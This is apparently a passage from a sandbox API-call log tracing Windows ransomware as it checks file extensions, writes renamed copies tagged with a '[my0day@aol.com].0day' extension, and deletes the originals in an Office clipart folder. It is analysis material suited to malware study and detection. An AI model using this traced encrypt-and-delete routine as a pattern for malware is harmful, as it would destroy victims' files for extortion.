(lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.806] lstrlenW (lpString=".ppt") returned 4 [0053.806] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.806] lstrlenW (lpString=".zip") returned 4 [0053.806] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.806] lstrlenW (lpString=".rar") returned 4 [0053.806] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.806] lstrlenW (lpString=".bz2") returned 4 [0053.806] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.806] lstrlenW (lpString=".7z") returned 3 [0053.806] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.806] lstrlenW (lpString=".dbf") returned 4 [0053.806] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.806] lstrlenW (lpString=".1cd") returned 4 [0053.806] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.806] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00165_.GIF") returned 63 [0053.806] lstrlenW (lpString=".jpg") returned 4 [0053.806] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.806] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=5375) returned 1 [0053.807] CloseHandle (hObject=0x234) returned 1 [0053.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 0x20 [0053.807] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0053.807] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.807] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.807] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.807] GetLastError () returned 0x0 [0053.807] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x14ff, lpOverlapped=0x0) returned 1 [0053.809] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1500, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1500, lpOverlapped=0x0) returned 1 [0053.810] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.810] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.810] SetEndOfFile (hFile=0x238) returned 1 [0053.810] CloseHandle (hObject=0x238) returned 1 [0053.810] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.810] SetEndOfFile (hFile=0x234) returned 1 [0053.811] CloseHandle (hObject=0x234) returned 1 [0053.811] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.811] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00169_.gif")) returned 1 [0053.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.811] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.811] lstrlenW (lpString=".doc") returned 4 [0053.811] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.811] lstrlenW (lpString=".docx") returned 5 [0053.811] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.811] lstrlenW (lpString=".pdf") returned 4 [0053.812] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.812] lstrlenW (lpString=".xls") returned 4 [0053.812] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.812] lstrlenW (lpString=".xlsx") returned 5 [0053.812] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.812] lstrlenW (lpString=".ppt") returned 4 [0053.812] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.812] lstrlenW (lpString=".zip") returned 4 [0053.812] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.812] lstrlenW (lpString=".rar") returned 4 [0053.812] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.812] lstrlenW (lpString=".bz2") returned 4 [0053.812] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.812] lstrlenW (lpString=".7z") returned 3 [0053.812] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.812] lstrlenW (lpString=".dbf") returned 4 [0053.812] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.812] lstrlenW (lpString=".1cd") returned 4 [0053.812] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.812] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00169_.GIF") returned 63 [0053.812] lstrlenW (lpString=".jpg") returned 4 [0053.812] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.812] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.812] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.813] GetLastError () returned 0x0 [0053.813] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2420, lpOverlapped=0x0) returned 1 [0053.814] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2430, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2430, lpOverlapped=0x0) returned 1 [0053.815] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.815] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.815] SetEndOfFile (hFile=0x238) returned 1 [0053.816] CloseHandle (hObject=0x238) returned 1 [0053.816] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.816] SetEndOfFile (hFile=0x234) returned 1 [0053.816] CloseHandle (hObject=0x234) returned 1 [0053.817] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.817] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00170_.gif")) returned 1 [0053.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.817] lstrlenW (lpString=".doc") returned 4 [0053.817] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.817] lstrlenW (lpString=".docx") returned 5 [0053.817] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.817] lstrlenW (lpString=".pdf") returned 4 [0053.817] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.817] lstrlenW (lpString=".xls") returned 4 [0053.817] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.817] lstrlenW (lpString=".xlsx") returned 5 [0053.817] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.817] lstrlenW (lpString=".ppt") returned 4 [0053.817] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.817] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.817] lstrlenW (lpString=".zip") returned 4 [0053.817] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.817] lstrlenW (lpString=".rar") returned 4 [0053.817] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.818] lstrlenW (lpString=".bz2") returned 4 [0053.818] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.818] lstrlenW (lpString=".7z") returned 3 [0053.818] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.818] lstrlenW (lpString=".dbf") returned 4 [0053.818] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.818] lstrlenW (lpString=".1cd") returned 4 [0053.818] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.818] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00170_.GIF") returned 63 [0053.818] lstrlenW (lpString=".jpg") returned 4 [0053.818] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.818] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.818] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.819] GetLastError () returned 0x0 [0053.819] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1398, lpOverlapped=0x0) returned 1 [0053.820] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x13a0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x13a0, lpOverlapped=0x0) returned 1 [0053.821] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.821] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.821] SetEndOfFile (hFile=0x238) returned 1 [0053.821] CloseHandle (hObject=0x238) returned 1 [0053.822] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.822] SetEndOfFile (hFile=0x234) returned 1 [0053.822] CloseHandle (hObject=0x234) returned 1 [0053.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.823] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00171_.gif")) returned 1 [0053.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.823] lstrlenW (lpString=".doc") returned 4 [0053.823] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.823] lstrlenW (lpString=".docx") returned 5 [0053.823] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.823] lstrlenW (lpString=".pdf") returned 4 [0053.823] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.823] lstrlenW (lpString=".xls") returned 4 [0053.823] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.823] lstrlenW (lpString=".xlsx") returned 5 [0053.823] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.823] lstrlenW (lpString=".ppt") returned 4 [0053.823] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.823] lstrlenW (lpString=".zip") returned 4 [0053.823] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.823] lstrlenW (lpString=".rar") returned 4 [0053.823] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.823] lstrlenW (lpString=".bz2") returned 4 [0053.823] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.823] lstrlenW (lpString=".7z") returned 3 [0053.824] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.824] lstrlenW (lpString=".dbf") returned 4 [0053.824] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.824] lstrlenW (lpString=".1cd") returned 4 [0053.824] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00171_.GIF") returned 63 [0053.824] lstrlenW (lpString=".jpg") returned 4 [0053.824] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.825] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.825] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.825] GetLastError () returned 0x0 [0053.825] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x1126, lpOverlapped=0x0) returned 1 [0053.826] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1130, lpOverlapped=0x0) returned 1 [0053.827] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.827] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.828] SetEndOfFile (hFile=0x238) returned 1 [0053.828] CloseHandle (hObject=0x238) returned 1 [0053.828] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.828] SetEndOfFile (hFile=0x234) returned 1 [0053.829] CloseHandle (hObject=0x234) returned 1 [0053.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.829] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1 [0053.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.829] lstrlenW (lpString=".doc") returned 4 [0053.829] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.829] lstrlenW (lpString=".docx") returned 5 [0053.829] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.829] lstrlenW (lpString=".pdf") returned 4 [0053.829] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.829] lstrlenW (lpString=".xls") returned 4 [0053.829] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.829] lstrlenW (lpString=".xlsx") returned 5 [0053.829] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.829] lstrlenW (lpString=".ppt") returned 4 [0053.829] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.829] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.829] lstrlenW (lpString=".zip") returned 4 [0053.829] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.830] lstrlenW (lpString=".rar") returned 4 [0053.830] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.830] lstrlenW (lpString=".bz2") returned 4 [0053.830] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.830] lstrlenW (lpString=".7z") returned 3 [0053.830] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.830] lstrlenW (lpString=".dbf") returned 4 [0053.830] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.830] lstrlenW (lpString=".1cd") returned 4 [0053.830] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63 [0053.830] lstrlenW (lpString=".jpg") returned 4 [0053.830] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.830] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.830] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.830] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238 [0053.830] GetLastError () returned 0x0 [0053.830] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0xf7e, lpOverlapped=0x0) returned 1 [0053.832] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xf80, lpOverlapped=0x0) returned 1 [0053.833] ReadFile (in: hFile=0x234, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.833] WriteFile (in: hFile=0x238, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.833] SetEndOfFile (hFile=0x238) returned 1 [0053.833] CloseHandle (hObject=0x238) returned 1 [0053.833] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.833] SetEndOfFile (hFile=0x234) returned 1 [0053.834] CloseHandle (hObject=0x234) returned 1 [0053.834] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.834] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1 [0053.834] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString=".doc") returned 4 [0053.835] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.835] lstrlenW (lpString=".docx") returned 5 [0053.835] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.835] lstrlenW (lpString=".pdf") returned 4 [0053.835] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.835] lstrlenW (lpString=".xls") returned 4 [0053.835] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.835] lstrlenW (lpString=".xlsx") returned 5 [0053.835] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.835] lstrlenW (lpString=".ppt") returned 4 [0053.835] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString=".zip") returned 4 [0053.835] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.835] lstrlenW (lpString=".rar") returned 4 [0053.835] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.835] lstrlenW (lpString=".bz2") returned 4 [0053.835] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.835] lstrlenW (lpString=".7z") returned 3 [0053.835] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString=".dbf") returned 4 [0053.835] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString=".1cd") returned 4 [0053.835] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.835] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63 [0053.835] lstrlenW (lpString=".jpg") returned 4 